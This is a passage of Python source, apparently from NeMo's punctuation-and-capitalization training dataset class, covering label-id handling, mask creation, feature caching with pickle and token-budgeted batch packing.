) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Creates segment ids array, input mask, loss mask.
Segment ids array is BERT token type ids in HuggingFace terminology. It is a zeros array for punctuation
and capitalization task.
Input mask element is ``True`` if an element of ``input_ids`` is not padding and ``False`` otherwise.
Loss mask element is ``True`` for the first token in a word. If ``ignore_start_end=False``, then loss mask
element is ``True`` for [CLS] and [SEP] tokens. If ``ignore_extra_tokens=False``, then loss mask element is ``True``
for all word tokens. In all other cases loss mask elements are ``False``.
Args:
input_ids: an integer array of shape ``[Batch, Time]`` containing ids of source token ids
subtokens_mask: a boolean array of shape ``[Batch, Time]`` which elements are ``True`` if they correspond to
the first token of some word
pad_id: an id of padding token
cls_id: an id of [CLS] token
sep_id: an id of [SEP] token
ignore_start_end: whether to compute loss for [CLS] and [SEP] tokens
ignore_extra_tokens: whether to compute loss for not first tokens in words
Returns:
segment_ids: int8 array of shape [Batch, Time]
input_mask: boolean array of shape [Batch, Time]
loss_mask: boolean array of shape [Batch, Time]
"""
segment_ids = np.zeros_like(input_ids, dtype=np.int8)
input_mask = np.not_equal(input_ids, pad_id)
special_mask = np.equal(input_ids, cls_id) & np.equal(input_ids, sep_id)
if ignore_start_end:
if ignore_extra_tokens:
loss_mask = subtokens_mask
else:
loss_mask = input_mask & ~special_mask
else:
if ignore_extra_tokens:
loss_mask = subtokens_mask | special_mask
else:
loss_mask = input_mask
return segment_ids, input_mask, loss_mask
def create_label_ids(unique_labels: Set[str], pad_label: str) -> Dict[str, int]:
"""
Returns label ids dictionary. ``pad_label`` always has id ``0``. Other labels are sorted in alphabetical order.
Args:
unique_labels: a set of labels from which label ids dictionary is created. May or may no contain ``pad_label``
pad_label: label used for padding. It is also a neutral label
Returns:
label ids dictionary
"""
label_ids = {pad_label: 0}
if pad_label in unique_labels:
unique_labels.remove(pad_label)
for label in sorted(unique_labels):
label_ids[label] = len(label_ids)
return label_ids
def load_label_ids(file_path: Union[str, os.PathLike]) -> Dict[str, int]:
ids = {}
with open(file_path) as f:
for i, line in enumerate(f):
ids[line.strip()] = i
return ids
def save_label_ids(label_ids: Dict[str, int], file_path: Path) -> None:
"""
Saves label ids map to a file. In each line of a file one label is saved. Labels are saved in the order of
increasing of their ids.
Args:
label_ids: label id dictionary. Pad label has to have id ``0``
file_path: path to a file where labels will be saved
"""
file_path.parent.mkdir(parents=True, exist_ok=True)
with file_path.open('w') as out:
labels, _ = zip(*sorted(label_ids.items(), key=lambda x: x[1]))
out.write('\n'.join(labels))
def raise_not_equal_labels_error(
first_labels: Dict[str, int], second_labels: Dict[str, int], first_labels_desc: str, second_labels_desc: str
) -> None:
"""
A helper function for raising comprehensible error if labels from 2 sources are different.
Such sources may include:
- labels stored in .nemo checkpoint
- labels stored in tarred dataset
- labels passed in config parameters ``model.common_dataset_parameters.{punct_label_ids,capit_label_ids}``
- labels from files passed in config parameters ``model.class_labels.{punct_labels_file,capit_labels_file}``
- labels in attributes ``PunctuationCapitalizationModel.{punct_label_ids,capit_label_ids}``
- any other source
This function helps to detect configuration early and give error messages that are easy to interpret.
Call this function if ``first_labels != second_labels``.
Args:
first_labels: first dictionary with labels
second_labels: second dictionary with labels
first_labels_desc: a description of first labels
second_labels_desc: a description of second labels
"""
missing_in_first = {k: second_labels[k] for k in set(second_labels) - set(first_labels)}
missing_in_second = {k: first_labels[k] for k in set(first_labels) - set(second_labels)}
not_equal = {
k: {'FIRST LABELS': first_labels[k], 'SECOND LABELS': second_labels[k]}
for k in set(first_labels) & set(second_labels)
if first_labels[k] != second_labels[k]
}
msg = f"{first_labels_desc} (FIRST LABELS) are not equal to {second_labels_desc} (SECOND LABELS)."
if len(missing_in_first) > 0:
msg += f" Number of SECOND LABELS missing in the FIRST LABELS: {len(missing_in_first)}."
if len(missing_in_second) > 0:
msg += f" Number of FIRST LABELS missing in the SECOND LABELS: {len(missing_in_second)}."
if len(not_equal) > 0:
msg += f" Number of labels which are not equal: {len(not_equal)}."
if len(missing_in_first) > 0:
msg += (
f" Several examples of missing SECONDS LABELS in the FIRST LABELS: "
f"{dict(list(missing_in_first.items())[:3])}."
)
if len(missing_in_second) > 0:
msg += (
f" Several examples of missing FIRST LABELS in the SECOND LABELS: "
f"{dict(list(missing_in_second.items())[:3])}."
)
if len(not_equal) > 0:
msg += f" Several examples of labels which are not equal: {dict(list(not_equal.items())[:3])}"
raise ValueError(msg)
def pad(vectors: List[np.ndarray], length: int, value: Union[int, float, bool]) -> np.ndarray:
"""
Pad vectors to length ``length`` and then stack.
Args:
vectors: a list of 1D arrays. Arrays to pad and stack
length: a length of padded sequence. Has to be greater or equal to the maximum length of an element of
``vectors``.
value: a value used for padding
Returns:
an array of padded vectors
"""
result = []
for v in vectors:
result.append(np.concatenate([v, np.full([length - v.shape[0]], value, dtype=v.dtype)]))
return np.stack(result)
class BertPunctuationCapitalizationDataset(Dataset):
"""
A dataset to use during training for punctuation and capitalization tasks.
For inference, you will need
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_infer_dataset.BertPunctuationCapitalizationInferDataset`.
For huge datasets which cannot be loaded into memory simultaneously use
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_tarred_dataset.BertPunctuationCapitalizationTarredDataset`.
Args:
text_file (:obj:`Union[str, os.PathLike]`): a path to a file with sequences, each line should contain a text
without punctuation and capitalization
labels_file (:obj:`Union[str, os.PathLike]`): a path to a file with labels, each line corresponds to word
labels for a sentence in the ``text_file``. Labels have to follow format described in this section of
documentation :ref:`NeMo Data Format<nemo-data-format-label>`.
max_seq_length (:obj:`int`): max number of tokens in a source sequence. ``max_seq_length`` includes for [CLS]
and [SEP] tokens. Sequences which are too long will be clipped by removal of tokens from the end of the
sequence.
tokenizer (:obj:`TokenizerSpec`): a tokenizer instance which has properties ``unk_id``, ``sep_id``, ``bos_id``,
``eos_id``.
num_samples (:obj:`int`, `optional`, defaults to :obj:`-1`): a number of samples you want to use for the
dataset. If ``-1``, use all dataset. Useful for testing.
tokens_in_batch (:obj:`int`, `optional`, defaults to :obj:`5000`): number of tokens in a batch including
paddings and special tokens ([CLS], [SEP], [UNK]). This class :meth:`__getitem__` method returns not
samples but ready batches. Number of samples in a batch is adjusted for input sequences lengths. If input
sequences are short, then a batch will contain more samples. Before packing into batches, samples are
sorted by number of tokens they contain. Sorting allows to reduce number of pad tokens in a batch
significantly. Regular PyTorch data loader shuffling will only permute batches with changing their content.
Proper shuffling is achieved via calling method :meth:`repack_batches_with_shuffle` every epoch. If
parameter ``number_of_batches_is_multiple_of`` is greater than 1, some batches may be split into smaller
pieces.
pad_label (:obj:`str`, `optional`, defaults to :obj:`'O'`): pad value to use for labels. It's also the neutral
label both for punctuation and capitalization.
punct_label_ids (:obj:`Dict[str, int]`, `optional`): dict to map punctuation labels to label ids. For dev set,
use label ids generated during training to support cases when not all labels are present in the dev set.
For training, it is recommended to set ``punct_label_ids`` to ``None`` or load from cache.
capit_label_ids (:obj:`Dict[str, int]`, `optional`): same ``punct_label_ids`` for capitalization labels.
ignore_extra_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to compute loss on
tokens which are not first tokens in a word. For example, assume that word ``'tokenization'`` is tokenized
into ``['token', 'ization']``. If ``ignore_extra_tokens=True``, loss mask for the word is
``[True, False]``, and if ``ignore_extra_tokens=False``, then loss mask is ``[True, True]``.
ignore_start_end (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to ignore [CLS] and [SEP] tokens
in the loss_mask.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to use pickled features already present
in ``cache_dir`` or not. If pickled features file does not exist or ``use_cache=False``, then features are
pickled in ``cache_dir``. Pickled features include input ids, subtokens mask (mask of first tokens in
words), encoded punctuation and capitalization labels, label ids. Features creation consumes considerable
time and this ``use_cache=True`` significantly speeds up training starting. Pickled features are also
used for sharing features between processes if data parallel training is used.
cache_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where cache (pickled features)
is stored. By default, ``text_file`` parent directory is used. This parameter is useful if dataset
directory is read-only and you wish to pickle features. In such a case specify a path to directory which
allows writing in ``cache_dir`` parameter.
get_label_frequencies (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to print and save label
frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir`` directory.
label_info_save_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where label frequencies
are saved. Be default a ``text_file`` parent directory is used. When method
:meth:`save_labels_and_get_file_paths` is called label ids are saved into ``label_info_save_dir``
directory. This parameter is useful if directory containing ``text_file`` is read-only.
punct_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): a path to a .csv file containing
punctuation label vocabulary. Each line in such a vocabulary file contains exactly one label. The first
line has to contain `pad_label`, otherwise error will be raised.
capit_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): same as ``punct_label_vocab_file`` for
capitalization labels.
add_masks_and_segment_ids_to_batch (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to add
``'loss_mask'``, ``'input_mask'``, ``'segment_ids'`` items to a batch. Useful for creation of tarred
dataset and can NOT be used during model training and inference.
verbose (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to show data examples, label stats and
other useful information.
n_jobs (:obj:`int`, `optional`, defaults to :obj:`0`): number of workers used for tokenization, encoding
labels, creating "first token in word" mask, and clipping. If ``n_jobs <= 0`` data preparation is performed
without multiprocessing. By default ``n_jobs`` is ``0``.
.. warning::
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
number_of_batches_is_multiple_of (:obj:`int`, `optional`, defaults to :obj:`1`): number of batches in the
dataset is made divisible by ``number_of_batches_is_multiple_of``. If ``number_of_batches_is_multiple_of``
is greater than 1, then several batches are split in parts until number of batches
is divisible by ``number_of_batches_is_multiple_of``. If there is no enough queries in the dataset to
create enough batches, then a warning is printed. This parameter is useful for dev and validation datasets
if multiple GPUs are used. The problem is that if number of batches is not evenly divisible by number of
GPUs, then some queries may be processed several times and metrics will be distorted.
batch_shuffling_random_seed (:obj:`int`, defaults to :obj:`int`): a random seed used for batches repacking and
shuffling.
tokenization_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting tokenization
progress. Useful for creation of tarred dataset
batch_mark_up_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
deciding which samples batches will contain. Useful for creation of tarred dataset
batch_building_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
batch creation (stacking and padding). Useful for creation of tarred dataset
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports. """
return {
'input_ids': NeuralType(('B', 'T'), ChannelType()),
'segment_ids': NeuralType(('B', 'T'), ChannelType()),
'input_mask': NeuralType(('B', 'T'), MaskType()),
'subtokens_mask': NeuralType(('B', 'T'), MaskType()),
'loss_mask': NeuralType(('B', 'T'), MaskType()),
'punct_labels': NeuralType(('B', 'T'), LabelsType()),
'capit_labels': NeuralType(('B', 'T'), LabelsType()),
}
def __init__(
self,
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
max_seq_length: int,
tokenizer: TokenizerSpec,
num_samples: int = -1,
tokens_in_batch: int = 5000,
pad_label: str = 'O',
punct_label_ids: Optional[Union[Dict[str, int], DictConfig]] = None,
capit_label_ids: Optional[Union[Dict[str, int], DictConfig]] = None,
ignore_extra_tokens: bool = False,
ignore_start_end: bool = True,
use_cache: bool = True,
cache_dir: Optional[Union[str, os.PathLike]] = None,
get_label_frequencies: bool = False,
label_info_save_dir: Optional[Union[str, os.PathLike]] = None,
punct_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
capit_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
add_masks_and_segment_ids_to_batch: bool = True,
verbose: bool = True,
n_jobs: Optional[int] = 0,
number_of_batches_is_multiple_of: int = 1,
batch_shuffling_random_seed: int = 42,tokenization_progress_queue: Optional[mp.Queue] = None,
batch_mark_up_progress_queue: Optional[mp.Queue] = None,
batch_building_progress_queue: Optional[mp.Queue] = None,
use_features: bool = True
) -> None:
""" Initializes BertPunctuationCapitalizationDataset. """
if isinstance(punct_label_ids, DictConfig):
punct_label_ids = OmegaConf.to_container(punct_label_ids)
if isinstance(capit_label_ids, DictConfig):
capit_label_ids = OmegaConf.to_container(capit_label_ids)
self._check_constructor_parameters(
text_file,
labels_file,
punct_label_ids,
capit_label_ids,
punct_label_vocab_file,
capit_label_vocab_file,
num_samples,
use_cache,
number_of_batches_is_multiple_of,
)
if punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
punct_label_ids = load_label_ids(punct_label_vocab_file)
if capit_label_vocab_file is not None:
capit_label_vocab_file = Path(capit_label_vocab_file).expanduser()
capit_label_ids = load_label_ids(capit_label_vocab_file)
self.text_file, self.labels_file = Path(text_file).expanduser(), Path(labels_file).expanduser()
if label_info_save_dir is None:
self.label_info_save_dir = self.text_file.parent
else:
self.label_info_save_dir = Path(label_info_save_dir).expanduser()
self.tokens_in_batch = tokens_in_batch
self.tokenizer = tokenizer
self.pad_label = pad_label
self.ignore_extra_tokens = ignore_extra_tokens
self.ignore_start_end = ignore_start_end
self.add_masks_and_segment_ids_to_batch = add_masks_and_segment_ids_to_batch
self.verbose = verbose
self.batch_mark_up_progress_queue = batch_mark_up_progress_queue
self.batch_building_progress_queue = batch_building_progress_queue
self.use_features = use_features
master_device = is_global_rank_zero()
self.features_pkl = self._get_path_to_pkl_features(self.text_file, cache_dir, max_seq_length, num_samples)
features = None
if master_device and not (self.features_pkl.is_file() and use_cache):
if verbose:
logging.info(f'Processing {self.text_file}')
res = self._read_dataset(self.text_file, self.labels_file, num_samples)
text_lines, punct_label_lines, capit_label_lines, punct_unique_labels, capit_unique_labels = res
if punct_label_ids:
self._check_label_ids_vs_unique_labels(
punct_label_ids, punct_unique_labels, 'punct', 'punctuation', self.labels_file
)
else:
punct_label_ids = create_label_ids(punct_unique_labels, self.pad_label)
if capit_label_ids:
self._check_label_ids_vs_unique_labels(
capit_label_ids, capit_unique_labels, 'capit', 'capitalzation', self.labels_file
)
else:
capit_label_ids = create_label_ids(capit_unique_labels, self.pad_label)
features = _get_features(
text_lines,
punct_label_lines,
capit_label_lines,
max_seq_length,
self.tokenizer,
pad_label=self.pad_label,
punct_label_ids=punct_label_ids,
capit_label_ids=capit_label_ids,
verbose=self.verbose,
progress_queue=tokenization_progress_queue,
n_jobs=n_jobs,
)
self.features_pkl.parent.mkdir(parents=True, exist_ok=True)
pickle.dump(tuple(list(features) + [punct_label_ids, capit_label_ids]), self.features_pkl.open("wb"))
if self.verbose:
logging.info(f'Features saved to {self.features_pkl}')
# wait until the master process writes to the processed data files
if torch.distributed.is_initialized():
torch.distributed.barrier()
if features is None:
features = pickle.load(self.features_pkl.open('rb'))
li = features[-2:]
self._check_label_ids_loaded_from_pkl(
punct_label_ids, capit_label_ids, *li, punct_label_vocab_file, capit_label_vocab_file
)
punct_label_ids, capit_label_ids = li[-2], li[-1]
if tokenization_progress_queue is not None:
tokenization_progress_queue.put(len(features[0]))
if self.verbose:
logging.info(f'Features restored from {self.features_pkl}')
features = features[:-2]
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels = features
self.punct_label_ids, self.capit_label_ids = punct_label_ids, capit_label_ids
self.number_of_batches_is_multiple_of = number_of_batches_is_multiple_of
self.batch_shuffling_random_state = np.random.RandomState(batch_shuffling_random_seed)
if not self.use_features:
return
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
if get_label_frequencies:
self.punct_label_frequencies = self._calculate_and_save_label_frequencies(self.punct_labels, 'punct')
self.capit_label_frequencies = self._calculate_and_save_label_frequencies(self.capit_labels, 'capit')
def _get_path_to_pkl_features(
self, text_file: Path, cache_dir: Optional[Union[str, os.PathLike]], max_seq_length: int, num_samples: int
) -> Path:
if cache_dir is None:
cache_dir = text_file.parent
else:
cache_dir = Path(cache_dir).expanduser()
vocab_size = getattr(self.tokenizer, "vocab_size", 0)
features_pkl = cache_dir / "cached.{}.{}.max_seq_length{}.vocab{}.{}.punctuation_capitalization.pkl".format(
text_file.stem,
self.tokenizer.name,
max_seq_length,
vocab_size,
f'num_samples{num_samples}' if num_samples > 0 else 'all_samples',
)
return features_pkl
@staticmethod
def _check_constructor_parameters(
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
punct_label_vocab_file: Union[str, os.PathLike],
capit_label_vocab_file: Union[str, os.PathLike],
num_samples: int,
use_cache: bool,
number_of_batches_is_multiple_of: int,
) -> None:
if torch.distributed.is_initialized() and torch.distributed.get_world_size() > 1 and not use_cache:
raise ValueError(
f"If you already created process group and the world size is greater than 1, then `use_cache` "
f"parameter has to `True`. Only master process prepares features and if `use_cache=False`, then "
f"other processes will not be able to obtain features. Alternatively, you may set `use_cache=False` "
f"and set up data before spawning processes. Use `cache_dir` dataset directory with "
f"`text_file` and `labels_file` is read-only."
)
if not (os.path.exists(text_file) and os.path.exists(labels_file)):
raise FileNotFoundError(
f'{text_file} or {labels_file} not found. The data should be split into 2 files: text.txt and '
f'labels.txt. Each line of the text.txt file contains text sequences, where words are separated with '
f'spaces. The labels.txt file contains corresponding labels for each word in text.txt, the labels are '
f'separated with spaces. Each line of the files should follow the format:\n'
f' [WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and '
f' [LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
)
if not str(text_file).endswith('.txt'):
raise ValueError(
f"Parameter `text_file` has to be path to a file with .txt extension, whereas `text_file={text_file}`"
)
if not str(labels_file).endswith('.txt'):
raise ValueError(
f"Parameter `labels_file` has to be path to a file with .txt extension, whereas "
f"`labels_file={labels_file}`"
)
if punct_label_ids is not None and punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
file_punct_label_ids = load_label_ids(punct_label_vocab_file)
if file_punct_label_ids != punct_label_ids:
raise_not_equal_labels_error(
first_labels=punct_label_ids,
second_labels=file_punct_label_ids,
first_labels_desc='Punctuation labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `punct_label_ids`',
second_labels_desc=f'Punctuation labels loaded from file {punct_label_vocab_file} path to which '
f'is passed in parameter `punct_label_vocab_file`',
)
if capit_label_ids is not None and capit_label_vocab_file is not None:
capit_vocab_file = Path(capit_label_vocab_file).expanduser()
file_capit_label_ids = load_label_ids(capit_vocab_file)
if file_capit_label_ids != capit_label_ids:
raise_not_equal_labels_error(
first_labels=capit_label_ids,
second_labels=file_capit_label_ids,
first_labels_desc='Capitalization labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `capit_label_ids`',
second_labels_desc=f'Capitalization labels loaded from file {capit_label_vocab_file} path to '
f'which is passed in parameter `capit_label_vocab_file`',
)
if num_samples == 0:
raise ValueError(
f"Parameter `num_samples` has to be positive or negative whereas `num_samples={num_samples}`. "
f"Negative `num_samples` is for using all samples in a dataset."
)
if number_of_batches_is_multiple_of < 1 or not isinstance(number_of_batches_is_multiple_of, int):
raise ValueError(
f"Parameter `number_of_batches_is_multiple_of` has to be positive integer whereas "
f"{number_of_batches_is_multiple_of} is given."
)
def _check_label_ids_loaded_from_pkl(
self,
parameter_punct_label_ids: Dict[str, int],
parameter_capit_label_ids: Dict[str, int],
pkl_punct_label_ids: Any,
pkl_capit_label_ids: Any,
punct_label_vocab_file: Optional[Path],
capit_label_vocab_file: Optional[Path],
) -> None:
if not isinstance(pkl_punct_label_ids, dict):
raise ValueError(
f"Punctuation label ids loaded from features file {self.features_pkl} have wrong type "
f"{type(pkl_punct_label_ids)}"
)
if parameter_punct_label_ids is not None:
if parameter_punct_label_ids != pkl_punct_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_punct_label_ids,
second_labels=pkl_punct_label_ids,
first_labels_desc="Punctuation labels passed in parameter `punct_label_ids`"
if punct_label_vocab_file is None
else f"Punctuation labels loaded from file {punct_label_vocab_file}",
second_labels_desc=f"Punctuation label ids loaded from features file {self.features_pkl}",
)
if not isinstance(pkl_capit_label_ids, dict):
raise ValueError(
f"Capitalization label ids loaded from features file {self.features_pkl} has wrong type "
f"{type(pkl_capit_label_ids)}"
)
if parameter_capit_label_ids is not None:
if parameter_capit_label_ids != pkl_capit_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_capit_label_ids,
second_labels=pkl_capit_label_ids,
first_labels_desc="Capitalization labels passed in parameter `capit_label_ids`"
if capit_label_vocab_file is None
else f"Capitalization labels loaded from file {capit_label_vocab_file}",
second_labels_desc=f"Capitalization label ids loaded from features file {self.features_pkl}",
)
@staticmethod
def _check_label_ids_vs_unique_labels(
label_ids: Dict[str, int], unique_labels: Set[str], label_type: str, task: str, label_file: Path
) -> None:
if unique_labels - set(label_ids):
not_present_labels = list(unique_labels - set(label_ids))
raise ValueError(
f"{len(not_present_labels)} {task} labels found in {label_file} are not present in "
f"`{label_type}_label_ids`. Examples of unexpected labels from {label_file}: {not_present_labels[:3]}"
)
@staticmethod
def _read_dataset(
text_file: Path, labels_file: Path, num_samples: int
) -> Tuple[Tuple[str, ...], Tuple[str, ...], Tuple[str, ...], Set[str], Set[str]]:
with open(text_file, 'r') as f:
text_lines = f.readlines()
punct_unique_labels, capit_unique_labels = set(), set()
punct_labels_lines, capit_labels_lines = [], []
with labels_file.open() as f:
for i, line in enumerate(f):
pairs = line.split()
if not all([len(p) == 2 for p in pairs]):
raise ValueError(
f"Some label pairs are not pairs but have wrong length (!= 2) in line {i} in label file "
f"{labels_file}"
)
words = text_lines[i].split()
if len(pairs) != len(words):
raise ValueError(
f"In line {i} in text file {text_file} number of words {len(words)} is not equal to the "
f"number of labels {len(pairs)} in labels file {labels_file}."
)
punct_line, capit_line = zip(*pairs)
punct_labels_lines.append(punct_line)
capit_labels_lines.append(capit_line)
punct_unique_labels.update(punct_line)
capit_unique_labels.update(capit_line)
if len(punct_labels_lines) != len(text_lines):
raise ValueError(
f"Number of text lines {len(text_lines)} in text file {text_file} is not equal to the number of lines "
f"{len(punct_labels_lines)} in labels file {labels_file}."
)
dataset = list(zip(text_lines, punct_labels_lines, capit_labels_lines))
if len(dataset) == 0:
raise ValueError(f"Dataset loaded from files {text_file} and {labels_file} is empty.")
if num_samples > 0:
dataset = dataset[:num_samples]
text_lines, punct_labels_lines, capit_labels_lines = zip(*dataset)
return text_lines, punct_labels_lines, capit_labels_lines, punct_unique_labels, capit_unique_labels
@staticmethod
def calc_batch_seq_length(queries: List[np.ndarray], length_is_multiple_of: int) -> int:
return ceil(max([len(elem) for elem in queries]) / length_is_multiple_of) * length_is_multiple_of
def _adjust_number_of_batches(
self,
input_ids: List[np.ndarray],
batch_beginnings: List[int],
batch_sizes: List[int],
batch_seq_lengths: List[int],
) -> Tuple[List[int], List[int], List[int]]:
"""
If length of ``batch_sizes`` list is not divisible by ``self.number_of_batches_is_multiple_of``, then
one or several batches are split into parts until number of batches is divisible by
``self.number_of_batches_is_multiple_of``.
The method selects a batch and tries to slice smaller batches with 8 elements each from the batch. If
the batch cannot be sliced any further and there are still not enough batches, then the next batch from dataset
is selected.
If slicing batches of size 8 is not enough, then batches of size 1 are created.
If dataset is too small to create enough batches, then a warning is shown.
Args:
input_ids: tokenized queries of the dataset. `input_ids` are expected to be sorted by length in ascending
order.
batch_beginnings: indices of first elements of batches created inside :meth:`_mark_up_batches` method.
Expected to be sorted in ascending order.
batch_sizes: sizes of batches created inside :meth:`_mark_up_batches` method.
batch_seq_lengths: lengths of elements in batch after padding created inside :meth:`_mark_up_batches`
method.
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes = batch_beginnings.copy(), batch_sizes.copy()
batch_seq_lengths = batch_seq_lengths.copy()
num_missing_batches = (
self.number_of_batches_is_multiple_of - len(batch_sizes) % self.number_of_batches_is_multiple_of
)
if num_missing_batches == 0:
return batch_beginnings, batch_sizes, batch_seq_lengths
if sum(batch_sizes) - len(batch_sizes) < num_missing_batches:
logging.warning(
f"Unable to achieve number of batches multiple of {self.number_of_batches_is_multiple_of} because "
f"dataset in files '{self.text_file}' and '{self.labels_file}' contains not enough queries "
f"({sum(batch_sizes)}) or queries in the dataset are too long. Dataset will have "
f"{len(batch_sizes)} batches instead. For validation or test dataset if multiple GPUs are used "
f"this will lead to distorted metrics because some batches will be processed several times. "
f"To fix this problem you may try to tweak (increase) parameter `tokens_in_batch`, though result is "
f"not guaranteed."
)
return batch_beginnings, batch_sizes, batch_seq_lengths
num_cut = 0
for ss in [8, 1]: # ss - split_size
old_num_batches = len(batch_sizes)
# Starting from the last batch because its size is likely to be not multiple of 8. Thus number of
# batches which size is not multiple of 8 can be reduced by 1.
original_batch_index = old_num_batches - 1
while original_batch_index >= 0 and num_cut < num_missing_batches:
bs, bb = batch_sizes[original_batch_index], batch_beginnings[original_batch_index]
rb = 0 # an index of sliced first element of sliced batch in original batch (relative beginning)
if rb < bs - ss:
while rb < bs - ss and num_cut < num_missing_batches:
batch_sizes.append(ss)
batch_beginnings.append(bb + rb)
batch_seq_lengths.append(
self.calc_batch_seq_length(input_ids[bb + rb : bb + rb + ss], length_is_multiple_of=8)
)
rb += ss
num_cut += 1
assert len(input_ids[bb + rb : bb + bs]) > 0
batch_sizes[original_batch_index] = bs - rb
batch_beginnings[original_batch_index] = bb + rb
batch_seq_lengths[original_batch_index] = self.calc_batch_seq_length(
input_ids[bb + rb : bb + bs], length_is_multiple_of=8
)
original_batch_index -= 1
# Keeping order of batches.
batch_beginnings, batch_sizes, batch_seq_lengths = map(
list, zip(*sorted(zip(batch_beginnings, batch_sizes, batch_seq_lengths), key=lambda x: x[0]))
)
assert len(batch_beginnings) % self.number_of_batches_is_multiple_of == 0
assert len(batch_sizes) % self.number_of_batches_is_multiple_of == 0
assert len(batch_seq_lengths) % self.number_of_batches_is_multiple_of == 0
return batch_beginnings, batch_sizes, batch_seq_lengths
def _mark_up_batches(self, input_ids: List[np.ndarray]) -> Tuple[List[int], List[int], List[int]]:
"""
Computes indices of first samples in batch, batch sizes, seq lengths for batches. ``input_ids`` has to be
sorted by number of tokens in ascending order.
Batches are marked up with respect to following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
If ``self.batch_mark_up_progress_queue`` is not None, then the progress in mark up is reported via
``self.batch_mark_up_progress_queue``. Otherwise, ``tqdm`` instance is created in this function.
Args:
input_ids: a list of 1D int32 arrays. Elements of ``input_ids`` have to be sorted by length in ascending
order
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes, batch_seq_lengths = [], [], []
current_max_length = 0
start = 0
if self.batch_mark_up_progress_queue is None:
inp_iterator = tqdm(enumerate(input_ids), total=len(input_ids), desc="Batch mark up", unit="query")
else:
inp_iterator = enumerate(input_ids)
progress_made = 0
for i, inp in inp_iterator:
current_max_length = max(current_max_length, ceil(len(inp) / 8) * 8)
if current_max_length * (i + 1 - start) > self.tokens_in_batch:
batch_size = (i - start) // 8 * 8
if batch_size == 0:
if i > start:
batch_size = i - start
logging.warning(
f"Could not create batch with multiple of 8 size. Probably, there is a too long sequence "
f"in the dataset or parameter `tokens_in_batch` is too small. Current length of sequences "
f"in batch is {current_max_length}. Batch size will be reduced to {batch_size}. "
f"tokens_in_batch={self.tokens_in_batch}. The batch includes sequences from "
f"{start} to {i - 1}."
)
else:
logging.warning(
f"Input sequence number {i - 1} is too long. Could not fit it into batch with "
f"{self.tokens_in_batch} tokens. Sequence number {i - 1} will not be added to batches."
)
start = i
current_max_length = ceil(len(inp) / 8) * 8
continue
seq_length = self.calc_batch_seq_length(input_ids[start : start + batch_size], length_is_multiple_of=8)
batch_beginnings.append(start)
batch_sizes.append(batch_size)
batch_seq_lengths.append(seq_length)
start += batch_size
current_max_length = self.calc_batch_seq_length(input_ids[start : i + 1], length_is_multiple_of=8)
if self.batch_mark_up_progress_queue is not None:
progress_made += 1
if progress_made >= BATCH_MARK_UP_PROGRESS_REPORT_PERIOD:
self.batch_mark_up_progress_queue.put(progress_made)
progress_made = 0
if start < len(input_ids):
seq_length = self.calc_batch_seq_length(input_ids[start:], length_is_multiple_of=8)
batch_beginnings.append(start)
batch_sizes.append(len(input_ids) - start)
batch_seq_lengths.append(seq_length)
if self.batch_mark_up_progress_queue is not None:
self.batch_mark_up_progress_queue.put(progress_made)
if len(batch_beginnings) % self.number_of_batches_is_multiple_of:
batch_beginnings, batch_sizes, batch_seq_lengths = self._adjust_number_of_batches(
input_ids, batch_beginnings, batch_sizes, batch_seq_lengths
)
assert sum(batch_sizes) == len(input_ids)
for i in range(len(batch_beginnings) - 1):
assert batch_beginnings[i] + batch_sizes[i] == batch_beginnings[i + 1]
assert batch_seq_lengths[i] >= max(
[len(inp) for inp in input_ids[batch_beginnings[i] : batch_beginnings[i] + batch_sizes[i]]]
)
return batch_beginnings, batch_sizes, batch_seq_lengths
def _pack_into_batches(
self,
input_ids: List[np.ndarray],
subtokens_mask: List[np.ndarray],
punct_labels: List[np.ndarray],
capit_labels: List[np.ndarray],
) -> List[Dict[str, np.ndarray]]:
"""
